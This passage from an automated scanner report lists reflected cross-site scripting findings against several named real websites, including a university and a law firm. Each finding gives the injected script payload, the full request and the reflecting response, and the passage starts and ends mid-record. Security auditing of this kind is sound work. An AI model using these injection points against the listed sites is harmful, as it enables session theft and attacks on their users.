The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22431"><script>alert(1)</script>39b00191ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:45 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src22431"><script>alert(1)</script>39b00191ec0/languages/tr/messages.js" type="hidden" />
...[SNIP]...

4.122. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92e21"><script>alert(1)</script>f034d66f85a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:53 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages92e21"><script>alert(1)</script>f034d66f85a/tr/messages.js" type="hidden" />
...[SNIP]...

4.123. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b62b0"><script>alert(1)</script>d0f3b71f96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/trb62b0"><script>alert(1)</script>d0f3b71f96/messages.js" type="hidden" />
...[SNIP]...

4.124. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88615"><script>alert(1)</script>175578b2d1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/languages/tr/messages.js88615"><script>alert(1)</script>175578b2d1c" type="hidden" />
...[SNIP]...

4.125. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71af9"><script>alert(1)</script>54fe96e1c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:52 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src71af9"><script>alert(1)</script>54fe96e1c71/scripts/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.126. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29665"><script>alert(1)</script>4685965d83d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.127. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfa3"><script>alert(1)</script>f6fd26bb8b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2" type="hidden" />
...[SNIP]...

4.128. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761c1"><script>alert(1)</script>3e557343cc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.129. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df85"><script>alert(1)</script>7f18c5be575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:13 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.130. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3070f"><script>alert(1)</script>9d19976bc93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:17 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2" type="hidden" />
...[SNIP]...

4.131. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69123"><script>alert(1)</script>fab6770260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?69123"><script>alert(1)</script>fab6770260=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2hrmotl33mdjrmgcj2rrd55mg4; path=/
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<form action="/login.php?return=/login.php?return=/submit.php?69123"><script>alert(1)</script>fab6770260=1" method="post">
...[SNIP]...

4.132. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 145ae--><script>alert(1)</script>51dbf0ddac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ns53ppdrjhtvontg84lgr82rl4; path=/
Vary: Accept-Encoding
Content-Length: 21511
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<a href="/login.php?return=/login.php?return=/submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1">
...[SNIP]...

4.133. http://www.hawaii.edu/cybersecurity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /cybersecurity/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72768"><script>alert(1)</script>6cb577da8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cybersecurity72768"><script>alert(1)</script>6cb577da8e/ HTTP/1.1
Host: www.hawaii.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:18:20 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/cybersecurity72768"><script>alert(1)</script>6cb577da8e/" size="60">
...[SNIP]...

4.134. http://www.hawaii.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed25"><script>alert(1)</script>b6c02b9894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5ed25"><script>alert(1)</script>b6c02b9894 HTTP/1.1
Host: www.hawaii.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:32:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6364
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/favicon.ico5ed25"><script>alert(1)</script>b6c02b9894" size="60">
...[SNIP]...

4.135. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2a27"><script>alert(1)</script>4c036e60d13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AboutUs/Online_Client_Service/Overview/?f2a27"><script>alert(1)</script>4c036e60d13=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=eweajw55sht4c1afbrxbaf45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94183
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/online_client_service/overview/?f2a27"><script>alert(1)</script>4c036e60d13=1&print=true'); ">
...[SNIP]...

4.136. http://www.hoganlovells.com/aboutus/history/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bebc"><script>alert(1)</script>e3fcc433cbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
